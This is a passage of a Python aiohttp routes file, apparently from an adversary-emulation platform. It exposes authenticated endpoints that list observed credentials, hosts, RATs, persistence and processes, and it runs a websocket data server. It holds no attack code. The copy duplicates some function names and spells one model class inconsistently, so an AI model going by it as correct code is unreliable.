'attachment; filename=\"bsf.json\"'}) async def query_bsf(request, log): return log["event_stream"] @api('/api/observed/credentials', methods=['GET'], auth_group=['human']) async def query_credentials(request): return ObservedCredential.objects @api('/api/observed/credentials/{credential}', methods=['GET'], objects={'credential': ObservedCredential}, auth_group=['human']) async def query_credential(request, token, credential): return credential @api('/api/observed/users', methods=['GET'], auth_group=['human']) async def query_users(request): return ObservedUser.objects @api('/api/observed/users/{user}', methods=['GET'], objects={'user': ObservedUser}, auth_group=['human']) async def query_user(request, token, user): return user @api('/api/observed/shares', methods=['GET'], auth_group=['human']) async def query_shares(request): return ObservedShare.objects @api('/api/observed/shares/{share}', methods=['GET'], objects={'share': ObservedShare}, auth_group=['human']) async def query_share(request, token, share): return share @api('/api/observed/files', methods=['GET'], auth_group=['human']) async def query_files(request): return ObservedFile.objects @api('/api/observed/files/{file}', methods=['GET'], objects={'file': ObservedFile}, auth_group=['human']) async def query_file(request, token, file): return file @api('/api/observed/domains', methods=['GET'], auth_group=['human']) async def query_domains(request): return ObservedDomain.objects @api('/api/observed/domains/{domain}', methods=['GET'], objects={'domain': ObservedDomain}, auth_group=['human']) async def query_domain(request, token, domain): return domain @api('/api/observed/os_versions', methods=['GET'], auth_group=['human']) async def query_os_versions(request): return ObservedOsversion.objects @api('/api/observed/os_versions/{os_version}', methods=['GET'], objects={'os_version': ObservedOSVersion}, auth_group=['human']) async def query_os_version(request, token, os_version): return os_version @api('/api/observed/hosts', methods=['GET'], auth_group=['human']) async def query_hosts(request): return ObservedHost.objects @api('/api/observed/hosts/{host}', methods=['GET'], objects={'host': ObservedHost}, auth_group=['human']) async def query_host(request, token, host): return host @api('/api/observed/schtasks', methods=['GET'], auth_group=['human']) async def query_schtasks(request): return ObservedSchtask.objects @api('/api/observed/schtasks/{schtask}', methods=['GET'], objects={'schtask': ObservedSchtask}, auth_group=['human']) async def query_schtask(request, token, schtask): return schtask @api('/api/observed/services', methods=['GET'], auth_group=['human']) async def query_timedeltas(request): return ObservedService.objects @api('/api/observed/services/{service}', methods=['GET'], objects={'service': ObservedService}, auth_group=['human']) async def query_timedelta(request, token, service): return service @api('/api/observed/timedeltas', methods=['GET'], auth_group=['human']) async def query_timedeltas(request): return ObservedTimeDelta.objects @api('/api/observed/timedeltas/{timedelta}', methods=['GET'], objects={'timedelta': ObservedTimeDelta}, auth_group=['human']) async def query_timedelta(request, token, timedelta): return timedelta @api('/api/observed/rats', methods=['GET'], auth_group=['human']) async def query_rats(request): return ObservedRat.objects @api('/api/observed/rats/{rat}', methods=['GET'], objects={'rat': ObservedRat}, auth_group=['human']) async def query_rat(request, token, rat): return rat @api('/api/observed/registry_keys', methods=['GET'], auth_group=['human']) async def query_registry_keys(request): return ObservedRegKey.objects @api('/api/observed/registry_keys/{registry_key}', methods=['GET'], objects={'registry_key': ObservedRegKey}, auth_group=['human']) async def query_regkey(request, token, registry_key): return registry_key @api('/api/observed/persistence', methods=['GET'], auth_group=['human']) async def query_persistence_all(request): return ObservedPersistence.objects @api('/api/observed/persistence/{persistence}', methods=['GET'], objects={'persistence': ObservedPersistence}, auth_group=['human']) async def query_persistence(request, token, persistence): return persistence @api('/api/observed/processes', methods=['GET'], auth_group=['human']) async def query_processes(request): return ObservedProcess.objects @api('/api/observed/processes/{process}', methods=['GET'], objects={'process': ObservedProcess}, auth_group=['human']) async def query_process(request, token, process): return process @api('/api/step', methods=['GET'], auth_group=['human']) async def query_step(request): return CodedStep.objects @websocket('/websocket', auth_group=["human"]) async def wb_operation(request): ws = web.WebSocketResponse() await ws.prepare(request) def write_websocket(data): if not ws.closed: ws.send_bytes(data) else: raise RuntimeError srv = ddp.DDPServer(write_websocket) srv.register_collection("operation", Operation) srv.register_collection("domain", Domain) srv.register_collection("host", Host) srv.register_collection("network", Network) srv.register_collection("rat", Rat) srv.register_collection("observed_rat", ObservedRat) srv.register_collection("observed_host", ObservedHost) srv.register_collection("observed_file", ObservedFile) srv.register_collection("observed_schtask", ObservedSchtask) srv.register_collection("job", Job) srv.register_collection("log", Log) srv.register_collection("adversary", Adversary) srv.register_collection("step", CodedStep) srv.register_collection("active_connection", ActiveConnection) srv.register_collection("agent", Agent) srv.register_collection("attack_technique", AttackTechnique) srv.register_collection("attack_tactic", AttackTactic) srv.register_collection("attack_list", AttackList) srv.register_collection("attack_group", AttackGroup) srv.register_collection("setting", Setting) srv.register_collection("artifactlist", Artifactlist) request.app['websockets'].append(ws) try: async for msg in ws: if msg.type == aiohttp.WSMsgType.TEXT or msg.type == aiohttp.WSMsgType.BINARY: srv.parse_message(msg.data) elif msg.type == aiohttp.WSMsgType.ERROR: log.debug('ws connection closed with exception {}'.format(ws.exception())) finally: request.app['websockets'].remove(ws) log.debug('websocket connection closed') return ws def init(app): for method, uri, func in routes: app.router.add_route(method, uri, func)
true
true